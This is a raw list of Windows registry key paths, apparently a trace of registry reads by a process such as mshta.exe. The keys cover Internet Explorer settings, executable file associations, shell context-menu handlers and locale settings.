HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ClientCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DriverCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_CURRENT_USER\Software\Microsoft\DXGI
HKEY_LOCAL_MACHINE\Software\Microsoft\DXGI
HKEY_CURRENT_USER\EUDC\1252
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\OperationalData
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_CURRENT_USER\Software\Microsoft\Avalon.Graphics
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender\Enabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\PrefetchPrerender
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{210acb58-272f-11e9-8326-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.NamespaceCLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 6
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ANotepad++\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\BriefcaseMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Open With EncryptionMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Sharing\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\{a2a9545d-a0c2-42b4-9708-a0b2badd77c8}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\CopyAsPathMenu\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\SendTo\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\XXX Groove GFS Context Menu Handler XXX\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\{596AB062-B4D2-4215-9F74-E9109B0A8153}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09799AFB-AD67-11d1-ABCD-00C04FC30936}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MultiSelectModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
\x1a60\x9cEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
